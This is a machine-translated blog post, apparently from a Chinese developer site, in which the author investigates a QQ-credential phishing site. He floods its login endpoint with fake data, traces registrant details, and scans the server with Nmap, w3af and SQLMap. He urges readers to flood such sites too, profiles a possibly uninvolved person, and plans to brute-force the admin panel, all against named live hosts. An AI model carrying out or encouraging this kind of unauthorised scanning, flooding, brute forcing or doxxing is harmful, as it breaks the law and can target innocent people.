Preface:

This post is not about showing off skills as some of the movers and shakers in the comments section think, but more about popularizing some useful infiltration tools and methods that I’m sure not all of you have used.

Just on zhihu to see an article “your QQ number is so stolen!” “, but the article briefly mentions a fake LOL site, uvu.cc/ixMJ, which is clearly a link shortening site. When opened, it will jump to other sites

The page looks like this:

! [image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/beed2dea5b2a4b0f832d5141c034009b~tplv-k3u1fbpfcp-zoom-1.im age)

Click login popup a dialog box, let input QQ number and password, casually input a go in, incredibly can log in, it seems to be a simple theft number of the website undoubtedly cough up.

! [image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/c1d278dff59f4f4a951ea16265dc2880~tplv-k3u1fbpfcp-zoom-1.im age)

I am very curious is, now people’s security awareness is so high, so low-level theft website can cheat people?

Forget it, no matter, habitually open the browser developer tools, first to see the theft of the number of the POST process. Found, POST to this address:

http://mfspfgp.top/lollove.php
Copy the code

There are only two parameters: name and pass.

! [image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/4a070debe769482b96bee586c0b265ae~tplv-k3u1fbpfcp-zoom-1.im With POST links and parameters in hand, you can start by using Python to forgery browser headers, generating random QQ numbers and passwords, and then using requests to recycle spam POST data to the server. After all, the main purpose is to alert the webmaster, The amount of data is less, 10000 is about the same, and IP proxy and multi-threaded concurrency are too lazy to add.
! [image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/d5e149a1d7784da3ba14911488dd1936~tplv-k3u1fbpfcp-zoom-1.im age)

The code is running, which encourages everyone (especially novices) to use similar methods to inject a bit of spam into the site. I guess the phishing masters will be devastated to see the spam data in the database, and from many IP addresses.

! [image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/67c0edf0420949e9b6e75cd73641fd37~tplv-k3u1fbpfcp-zoom-1.im age)

All right, let’s just keep it running, and let’s see if we can dig up something else.

Note:

The phishing site does not necessarily write the account password into the database, and there is not necessarily a page to display after writing into the database, so XSS is very difficult.

Moreover, the website may also save data by sending emails or writing texts. Now the patch of the mailbox system is updated quickly, and XSS is not easy to get. Someone said in the comments that it is very easy to XSS, please inform us the specific implementation method, thank you very much!

PING the domain name (mfspfgp.top) to get the server’s IP address (103.98.114.75).

! [image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/d7a55a75edfd466cb3b6c09a886e8821~tplv-k3u1fbpfcp-zoom-1.im age)

Checked this address, it is the server of Hong Kong, also pardonable, the domain name that does not put on record so also dare to hang on the server outside only.

! [image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/8c946241f9854aa48868e2227002e580~tplv-k3u1fbpfcp-zoom-1.im age)

After checking the whoIS information of this domain name, I got a QQ mailbox and a mobile phone number. Of course, these two contact information may not be true.

! [image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/8cad9625ba73437eb99644b36d43108e~tplv-k3u1fbpfcp-zoom-1.im age)

Use QQ search this QQ number, show is a jiangxi Ji ‘an young, and his QQ space is open, go in to see, also did not find anything valuable, only see this little brother like to play league of Heroes and king of glory.

! [image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/ef8f91a7bae04c2ca0a3b24451b37e2c~tplv-k3u1fbpfcp-zoom-1.im age)

Searching the QQ number and corresponding QQ mailbox on the search engine did not find any valuable information, so, the above QQ number should not be the master of the fishing site, it is likely to be stolen by this site.

A search on wechat shows that the location is Luoyang, Henan Province, and his wechat profile picture should be himself. But I’m not sure he owns the site, so I won’t show his picture.

! [image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/0d30be79910746b897c0d1f653073366~tplv-k3u1fbpfcp-zoom-1.im age)

After that, I used the mailbox reverse check tool to check which websites this mailbox also registered. I found 9 websites and found that 6 of them could be accessed normally.

! [image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/6f44dc7742f14cb4a918f5f3a7af548e~tplv-k3u1fbpfcp-zoom-1.im age)

The six accessible sites are:

Fjkskda. top, jLIGyts.top, PFDQLq. top, yiqilin. Top, ZykjGkd. Top, mfSPFgP.top

Corresponding to the three forms of fraud webpage, they are “Birthday wishes”, “Cool Show summer” and “2017 competition officially starts” just shown, the last two pages are shown as follows:

The theft of these three pages are all the same, so by the way will be above the program to other sites run, do not thank, my name is Lei Feng ~

After Ping all the addresses mentioned above to get all the IP addresses, choose the IP with the most detailed physical location to try.

! [image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/23b0eb45128b4417918f68f5cfc2c29f~tplv-k3u1fbpfcp-zoom-1.im age)

First of all, search the IP address in WhatWeb, you can know that this website uses nginx 1.8.1 server, using PHP version 5.5.38.

! [image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/ed8dd1f2d83540d99539479068e71307~tplv-k3u1fbpfcp-zoom-1.im age)

Then I used Nmap to scan the ports and running services, and found that there are quite a number of open ports.

! [image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/fb1dd19e7ccb46d2be8a879b762edf35~tplv-k3u1fbpfcp-zoom-1.im age) 
PORT STATE SERVICE 1/tcp open tcpmux 3/tcp open compressnet 4/tcp open unknown 6/tcp open unknown 7/tcp open echo 9/tcp open discard ... Omit... 61900/tcp open unknown 62078/tcp open iphone-sync 63331/tcp open unknown 64623/tcp open unknown 64680/tcp open unknown 65000/tcp open unknown 65129/tcp open unknown 65389/tcp open unknownCopy the code

(As an aside: the iPhone-sync service for port 62078 feels a bit like Apple Sync.)

W3af is then used to detect some weaknesses of the website and obtain some important information. But don’t know what’s going on, this run w3af thread error, cause there is no complete scanning, fortunately, sweep out a sensitive links: http://103.27.176.227/OGeU3BGx.php.

! [image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/88aff8c269ad4c3394b8f19fd44813ea~tplv-k3u1fbpfcp-zoom-1.im age)

When you visit the link in your browser, you get an error page, but one key message appears below: Powered by WDCP

! [image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/49249253c47947f3a5b8e002da0468cb~tplv-k3u1fbpfcp-zoom-1.im age)

Click on WDCP to enter its official page, and you’ll find the following important information, as well as a thoughtful experience site:

Demo.wdlinux.cn you can try it.

! [image](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/7af1bf25af1e435aabcb3327782e3786~tplv-k3u1fbpfcp-zoom-1.image)

This is the background address of the phishing website:

http://103.27.176.227:8080

! [image](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/bd3e897fb390490cbc9b327739ead3b4~tplv-k3u1fbpfcp-zoom-1.image)

In addition, I just went to the experience site to try, found that when changing the password, the user name is always admin, can not change, plus the original login page does not have a verification code, I guess I can try brute force crack.

! [image](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/be5fbc4ec5af4ccaaa2f5108a8b4ab9f~tplv-k3u1fbpfcp-zoom-1.image)

The injection point of the login form was scanned using SQLMap and was not found.

! [image](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/1d2419d4c9144464bac2344d86c44601~tplv-k3u1fbpfcp-zoom-1.image)

Is it really the only way to brute force crack a password? Still thinking…